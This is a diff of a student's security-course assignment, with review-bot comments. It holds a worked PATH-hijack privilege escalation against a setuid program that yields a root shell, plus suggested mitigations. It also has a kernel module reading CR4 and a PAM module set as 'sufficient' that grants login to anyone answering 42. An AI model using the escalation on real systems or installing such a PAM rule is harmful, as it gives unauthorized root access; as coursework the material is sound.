Diffstat (limited to 'CamilStaps-s4498062-Assignment-2')
-rw-r--r-- | CamilStaps-s4498062-Assignment-2/ex1/ex1.txt | 21 | ||||
-rw-r--r-- | CamilStaps-s4498062-Assignment-2/ex2/Makefile | 8 | ||||
-rw-r--r-- | CamilStaps-s4498062-Assignment-2/ex2/ex2.txt | 20 | ||||
-rw-r--r-- | CamilStaps-s4498062-Assignment-2/ex2/hello-cr4.c | 22 | ||||
-rw-r--r-- | CamilStaps-s4498062-Assignment-2/ex3/Makefile | 5 | ||||
-rw-r--r-- | CamilStaps-s4498062-Assignment-2/ex3/login | 3 | ||||
-rw-r--r-- | CamilStaps-s4498062-Assignment-2/ex3/pam_questions.c | 72 |
7 files changed, 151 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
new file mode 100644
index 0000000..28c5e20
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
@@ -0,0 +1,21 @@
+a
+ Using strace -feprocess ./showdate we see the following interesting calls:
+ execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */])
+ execve("/bin/date", ["date"], [/* 37 vars */])
+
+b
+ $ ln -s /bin/sh date
+ $ export PATH=.:$PATH
+ $ ./showdate
+ # id
+ uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(camil)
+
+c
+ - Simply don't use execve for something as simple as this.
+ - The currently used system call is:
+ execve("/bin/sh", ["sh, "-c", "date"], [/* 37 vars */])
+ This could be changed to:
+ execve("/bin/date", ...)
+ A nonprivileged user cannot change /bin/date.
+ - Drop privileges before executing execve.
+
diff --git a/CamilStaps-s4498062-Assignment-2/ex2/Makefile b/CamilStaps-s4498062-Assignment-2/ex2/Makefile
new file mode 100644
index 0000000..a87a542
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex2/Makefile
@@ -0,0 +1,8 @@
+obj-m += hello-cr4.o
+
+all:
+ make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+ make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+
diff --git a/CamilStaps-s4498062-Assignment-2/ex2/ex2.txt b/CamilStaps-s4498062-Assignment-2/ex2/ex2.txt
new file mode 100644
index 0000000..35afd58
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex2/ex2.txt
@@ -0,0 +1,20 @@
+a
+ According to https://en.wikipedia.org/wiki/Control_register#CR4, the SMAP and SMEP bits are used to protect ring 0.
+ If writing to CR4 would be allowed, we could disable this protection, and access kernel space data (e.g.)
+
+b
+ 0x40050e <main+8> mov %cr4,%rax
+
+ This attempts to move the RAX register to the CR4 register, i.e. to write to CR4.
+
+c
+ Done. I suppose it isn't necessary to give you the code or results, as all was needed was copying from the given website.
+
+d
+ See hello-cr4.c and Makefile.
+
+ # make
+ [..]
+ # insmod hello-cr4.ko
+ [15892.352286] Hello world! CR4 = 7f0
+
diff --git a/CamilStaps-s4498062-Assignment-2/ex2/hello-cr4.c b/CamilStaps-s4498062-Assignment-2/ex2/hello-cr4.c
new file mode 100644
index 0000000..9db671d
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex2/hello-cr4.c
@@ -0,0 +1,22 @@
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/init.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Camil Staps");
+MODULE_DESCRIPTION("A Simple Hello World module");
+
+static int __init hello_init(void) {
+ unsigned long long result;
+ __asm__("movq %%cr4, %%rax\n" : "=a"(result));
+ printk(KERN_INFO "Hello world! CR4 = %11x\n", result);
+ return 0;
+}
+
+static void __exit hello_cleanup(void) {
+ printk(KERN_INFO "Cleaning up module.\n");
+}
+
+module_init(hello_init);
+module_exit(hello_cleanup);
+
diff --git a/CamilStaps-s4498062-Assignment-2/ex3/Makefile b/CamilStaps-s4498062-Assignment-2/ex3/Makefile
new file mode 100644
index 0000000..7ff3de0
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex3/Makefile
@@ -0,0 +1,5 @@
+all:
+ gcc -fPIC -DPIC -shared -rdynamic -o pam_questions.so pam_questions.c
+ cp pam_questions.so /lib/security
+ chown root:root /lib/security/pam_questions.so
+ chmod 755 /lib/security/pam_questions.so
diff --git a/CamilStaps-s4498062-Assignment-2/ex3/login b/CamilStaps-s4498062-Assignment-2/ex3/login
new file mode 100644
index 0000000..3e1c3cb
--- /dev/null
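Review bot: In hello_init (ex2/hello-cr4.c) the `printk` format, as rendered here, is `%11x` — a field width of eleven with an `unsigned int` conversion — while the argument `result` is `unsigned long long`, so the specifier does not match the argument type; `%llx` looks like what was meant: `printk(KERN_INFO "Hello world! CR4 = %llx\n", result);`. Since the printed value is what the write-up uses to read off the CR4 protection bits, the conversion should cover the full register width. The inline asm also names `%%rax` by hand while binding the output with `"=a"`, and it is not `volatile`; `__asm__ volatile("mov %%cr4, %0" : "=r"(result));` lets the compiler choose the register and keeps the read from being dropped or moved.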
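Review bot: The `all` target in ex3/Makefile both builds pam_questions.so and installs it into `/lib/security`, so a plain `make` has to run as root and replaces a shared object that PAM-using services load. A build-only `all` plus a separate `install` target keeps compilation unprivileged. Installing in a single step, `install -o root -g root -m 0755 pam_questions.so /lib/security/`, also avoids the interval in which the copied file sits in place with whatever owner and mode `cp` produced before `chown` and `chmod` run. Adding `-Wall -Wextra` to the gcc line would enable compiler diagnostics for the module.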
+++ b/CamilStaps-s4498062-Assignment-2/ex3/login
@@ -0,0 +1,3 @@
+# PAM configuration file
+auth sufficient pam_questions.so
+
diff --git a/CamilStaps-s4498062-Assignment-2/ex3/pam_questions.c b/CamilStaps-s4498062-Assignment-2/ex3/pam_questions.c
new file mode 100644
index 0000000..b93dc4e
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex3/pam_questions.c
@@ -0,0 +1,72 @@
+/* Source code from http://www.rkeene.org/projects/info/wiki/222, adapted by Camil Staps */
+
+/* Define which PAM interfaces we provide */
+#define PAM_SM_ACCOUNT
+#define PAM_SM_AUTH
+#define PAM_SM_PASSWORD
+#define PAM_SM_SESSION
+
+/* Include PAM headers */
+#include <security/pam_appl.h>
+#include <security/pam_modules.h>
+
+/* Other headers */
+#include <time.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+/* Our questions and answers */
+const char * const q[5] = {
+ "6*7",
+ "the answer to life the universe and everything",
+ "'forty two' in numbers",
+ "the meaning of 'efa-polo roa' in Malagasi",
+ "not 54" };
+const char a[5] = {42, 42, 42, 42, 42};
+
+/* PAM entry point for session creation */
+int pam_sm_open_session(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+ return(PAM_IGNORE);
+}
+
+/* PAM entry point for session cleanup */
+int pam_sm_close_session(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+ return(PAM_IGNORE);
+}
+
+/* PAM entry point for accounting */
+int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+ return(PAM_IGNORE);
+}
+
+/* PAM entry point for authentication verification */
+int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+ const char* username;
+ pam_get_user(pamh, &username, NULL);
+
+ srand(time(NULL));
+ int r = rand() % 5;
+ printf("What is %s? ", q[r]);
+ int resp;
+ scanf("%d", &resp);
+
+ if (resp == a[r]) {
+ return(PAM_SUCCESS);
+ } else {
+ return(PAM_AUTH_ERR);
+ }
+}
+
+/*
+ PAM entry point for setting user credentials (that is, to actually
+ establish the authenticated user's credentials to the service provider)
+*/
+int pam_sm_setcred(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+ return(PAM_IGNORE);
+}
+
+/* PAM entry point for authentication token (password) changes */
+int pam_sm_chauthtok(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+ return(PAM_IGNORE);
+}
+
|
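Review bot: In pam_sm_authenticate the result of `scanf("%d", &resp)` is never checked, so on empty or non-numeric input `resp` is compared with `a[r]` while still uninitialized, and the return value of `pam_get_user` is ignored as well. The question and reply also go through the process's own stdout/stdin instead of the PAM conversation, which only works when the calling application happens to have a terminal there; Linux-PAM's `pam_prompt` (declared in `security/pam_ext.h`) sends the prompt through the application's conversation function. Calling `srand(time(NULL))` on every attempt reseeds the host application's global PRNG with a predictable value, although with every entry of `a` equal to 42 the choice of question does not change the outcome. A sketch of the body with a checked, conversation-based read follows.

```c
int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
	const char* username;
	if (pam_get_user(pamh, &username, NULL) != PAM_SUCCESS) {
		return(PAM_AUTH_ERR);
	}

	/* … unchanged: srand/rand selection of r … */

	/* Ask through the application's conversation function instead of stdio. */
	char *reply = NULL;
	if (pam_prompt(pamh, PAM_PROMPT_ECHO_ON, &reply, "What is %s? ", q[r]) != PAM_SUCCESS
			|| reply == NULL) {
		return(PAM_AUTH_ERR);
	}

	/* Accept only a complete decimal number; anything else fails closed. */
	char *end;
	long resp = strtol(reply, &end, 10);
	int ok = (end != reply && *end == '\0' && resp == a[r]);
	free(reply);

	return(ok ? PAM_SUCCESS : PAM_AUTH_ERR);
}
```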